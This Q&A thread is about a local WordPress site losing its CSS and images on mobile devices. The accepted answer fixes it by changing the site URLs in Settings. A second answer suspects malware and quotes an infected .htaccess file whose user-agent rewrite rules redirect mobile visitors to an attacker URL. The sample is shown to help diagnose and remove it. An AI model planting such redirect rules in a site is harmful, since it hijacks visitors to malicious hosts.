# My wordpress site does' t show up photos and css on smartphone, ipad

Tags: wordpress, wordpress-theming

I am having a local wordpress website, on pc, everything looks fine, however, on ipad, or smartphone, the website doesn' t look fine, no css, images, only plain textes.

I check the images links on pc, they are store as localhost/mywebsite/uploads...

my css, my sliders, the images nothing, only html on smartphones and tablets...

How can I fix it ?

Thanks for your help

Regards

Answer (score 0, accepted):

In fact, I found the answer, have to change the wordpress address URL and site address URL in the dashboard, Settings > General screen

Answer (score 0):

First, You've provided very less information about the problem. But as per my experience I suspect that there's some malicious code inside your wordpress installation.

Try these steps to figure out the problem

- Check your ***wp-admin***, ***wp-admin/network*** and ***wp-includes*** folder and see if there's any ***.htaccess*** file present there. If it contains that file then delete that file.
- Check for ***HTTP_USER_AGENT*** or ***navigator.userAgent.match*** in your theme directory.

Your .htaccess file might be infected with malicious code as example below. This actually forces request to the attacker url. Which is changing the default behavior of your wordpress installation.

```
RewriteEngine On 
RewriteCond %{HTTP_USER_AGENT} ^1207.*|^3gso.*|^4thp.*|^501i.*|^502i.*|^503i.*|^504i.*|^505i.*|^506i.*|.*Fennec.*|^6310.*|^6590.*|^770s.*|^802s.*|.*a100.*|.*a510.*|.*a511.*|^abac.*|^acer.*|^acoo.*|^acs.*|^aiko.*|^airn.*|.*alacatel.*|^alav.*|^alca.*|^alco.*|^amoi.*|^Amoi.*|.*android.*|^anex.*|^anny.*|^anyw.*|^aptu.*|^arch.*|^argo.*|^aste.*|^asus.*|^ASUS.*|^attw.*|^au.*|^audi.*|^Audiovox.*|^AU-MIC.*|^aur.*|^aus.*|^avan.*|^beck.*|^bell.*|^benq.*|^BenQ.*|^bilb.*|^bird.*|^Bird.*|^blac.*|.*BlackBerry.*|^blaz.*|.*Blazer.*|.*boxee.*|.*BRAVIA.*|^brew.*|^brvw.*|^bumb.*|^bw.*|^c55.*|^capi.*|^ccwa.*|^cdm.*|^CDM.*|.*CE-HTML.*|^cell.*|^chtm.*|^cldc.*|^cmd.*|^comp.*|^cond.*|.*CorePlayer.*|^craw.*|^dait.*|^dall.*|^dang.*|^dbte.*|^dc.*|.*dell\ streak.*|^devi.*|^dica.*|.*DLNA.*|.*DLNADOC.*|^dmob.*|^doco.*|^DoCoMo.*|^dopo.*|^dopod.*|^ds.*|^ds12.*|^el49.*|^elai.*|^eml2.*|^emul.*|^eric.*|.*Ericsson.*|^erk0.*|^esl8.*|^ez40.*|^ez60.*|^ez70.*|^ezos.*|^ezwa.*|^ezze.*|^fake.*|^fetc.*|^fly.*|.*FlyCast.*|.*foobar2000.*|^g1.*|^g560.*|^gene.*|^gf.*|^go.*|.*GomPlayer.*|^good.*|.*GoogleTV.*|^grad.*|^grun.*|^haie.*|^Haier.*|.*hbbtv.*|.*HbbTV.*|^hcit.*|^hd.*|^hei.*|^hipt.*|^hita.*|^HP.*|.*htc.*|^htca.*|^htcg.*|^htcp.*|^htcs.*|^htct.*|^http.*|^huaw.*|.*Huawei.*|^hutc.*|^i230.*|^iac.*|^ibro.*|^idea.*|.*iemobile.*|^ig01.*|^ikom.*|^im1k.*|^i-mobile.*|^inno.*|.*ipad.*|^ipaq.*|.*iPAQ.*|.*iphone.*|.*iPod.*|^iris.*|.*iTunes.*|^jata.*|^java.*|^jbro.*|^jemu.*|^jigs.*|^kddi.*|^KDDI.*|^keji.*|^kgt.*|.*kindle.*|^klon.*|^KONKA.*|^kpt.*|^kwc.*|^KWC.*|^kyoc.*|^kyok.*|.*Large\ Screen.*|^leno.*|^Lenovo.*|^lexi.*|^lg.*|^lg50.*|^lg54.*|^lge.*|^libw.*|^lynx.*|^m3ga.*|^m50.*|^mate.*|^maui.*|^maxo.*|^mc01.*|^mc21.*|^mcca.*|^medi.*|^merc.*|^meri.*|^midp.*|.*midp.*|.*mini.*|^mio8.*|^mioa.*|.*Miro.*|^mits.*|^mmef.*|^mo01.*|^mo02.*|^mobi.*|.*mobile.*|^mode.*|^modo.*|^mot.*|^motv.*|^mozz.*|.*MPlayer.*|.*MSN.*|^mt50.*|^mtp1.*|^mtv.*|^mwbp.*|^mywa.*|^n100.*|^n101.*|^n102.*|^n202.*|^n203.*|^n300.*|^n302.*|^n500.*|^n502.*|^n505.*|^n700.*|^n701.*|^n710.*|^nec.*|^NEC-.*|^nem.*|^neon.*|^netf.*|.*NETTV.*|^newg.*|^NEWGEN.*|^newt.*|.*Nexus\ 10.*|.*Nexus\ 7.*|.*Nintendo.*|^nok6.*|^noki.*|.*Nokia.*|.*Novarra.*|^nzph.*|^o2.*|.*o2.*|.*O2.*|^o2im.*|.*Opera.Mobi.*|^opti.*|^opwv.*|^oran.*|^owg1.*|^p800.*|.*Palm.*|^pana.*|^Panasonic.*|^pand.*|^pant.*|^PANTECH.*|^pdxg.*|^PG.*|^pg13.*|^phil.*|^Philips.*|^pire.*|^play.*|.*PLAYSTATION\ 3.*|.*Plex.*|^pluc.*|^pock.*|.*pocket.*|^port.*|^portalmmm.*|^pose.*|^PPC.*|^prox.*|.*PS3.*|^psio.*|.*psp.*|^qc07.*|^qc12.*|^qc21.*|^qc32.*|^qc60.*|^qci.*|^qtek.*|^Qtek.*|.*QuickTime.*|^qwap.*|^r380.*|^r600.*|^raks.*|^rim9.*|^rove.*|^rozo.*|^s55.*|^sage.*|^Sagem.*|^SAGEM.*|^sama.*|^samm.*|^sams.*|.*SAMSUNG.*|^sany.*|.*Sanyo.*|^sava.*|^sc01.*|^sch.*|^SCH.*|.*SCH-.*|.*sch-i800.*|^scoo.*|^scp.*|^sdk.*|^se47.*|^sec.*|^SEC.*|^sec0.*|^sec1.*|^semc.*|.*SEMC-Browser.*|^send.*|^Sendo.*|^seri.*|^sgh.*|^SGH.*|.*SGH-.*|.*sgh-t849.*|^shar.*|^Sharp.*|.*shw-m180s.*|^sie.*|^SIE.*|^siem.*|^SIEMENS.*|.*silk.*|^sl45.*|^slid.*|^smal.*|^smar.*|.*Smarthub.*|.*smartphone.*|.*SmartTV.*|.*SMART-TV.*|^smb3.*|^smit.*|^smt5.*|^soft.*|^SoftBank.*|^sony.*|^SonyEricsson|^SonyEricsson.*|.*SonyEricsson.*|^sp01.*|^sph.*|^SPH.*|^spv.*|^sy01.*|^symb.*|.*symbian.*|.*SymbianOS.*|^t218.*|^t250.*|^t600.*|^t610.*|^t618.*|.*tablet.*|^tagt.*|^talk.*|^tcl.*|^tdg.*|.*teleca.*|^teli.*|^telm.*|^tim.*|^topl.*|^tosh.*|.*Toshiba.*|.*treo.*|^ts70.*|^tsm.*|^tsm3.*|^tsm5.*|.*up\.browser.*|^upg1.*|.*up\.link.*|.*UPnP.*|^upsi.*|^UTS.*|^utst.*|^v400.*|^v750.*|^veri.*|^Vertu.*|^virg.*|^vite.*|^vk40.*|^vk50.*|^vk52.*|^vk53.*|.*VLC\ media\ player.*|^vm40.*|^voda.*|.*vodafone.*|^vulc.*|^vx52.*|^vx53.*|^vx60.*|^vx61.*|^vx70.*|^vx80.*|^vx81.*|^vx83.*|^vx85.*|^vx98.*|^w3c.*|.*WAFA.*|^wap.*|.*wap.*|^wapa.*|^wapi.*|^wapj.*|^wapm.*|^wapp.*|^wapr.*|^waps.*|^wapt.*|^wapu.*|^wapv.*|^wapy.*|^webc.*|.*webOS.*|.*WebTV.*|^whit.*|.*BOLT.*|^wig.*|.*wii.*|^winc.*|.*windows\ ce.*|.*Windows.CE.*|.*Windows-Media-Player.*|.*WindowsPhone.*|.*Windows\ Phone.*|^winw.*|^wmlb.*|^wonu.*|^x700.*|.*XBMC.*|.*xbox.*|^xda.*|.*Xda.*|^xda2.*|^xdag.*|^yas.*|^your.*|^zeto.*|^ZTE.* [NC,OR]
RewriteCond %{HTTP_ACCEPT} text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml [NC,OR]
RewriteCond %{HTTP:HTTP_X_WAP_PROFILE} .+ [OR]
RewriteCond %{HTTP:HTTP_PROFILE} .+ [OR]
RewriteCond %{HTTP:X-OperaMini-Features} .+ [OR]
RewriteCond %{HTTP:UA-pixels} .+
RewriteRule ^(.*)$ http://url.com [L,R=302]
```

Also, if this malicious .htaccess file is placed inside *wp-admin/* or *wp-admin/network/* or *wp-includes/* then it'll also cause issue in calling css & other media files. Because whenever you'll try to access them then they'll return as **Not Found** or **Moved Permanently** in your *Mobile Browser*.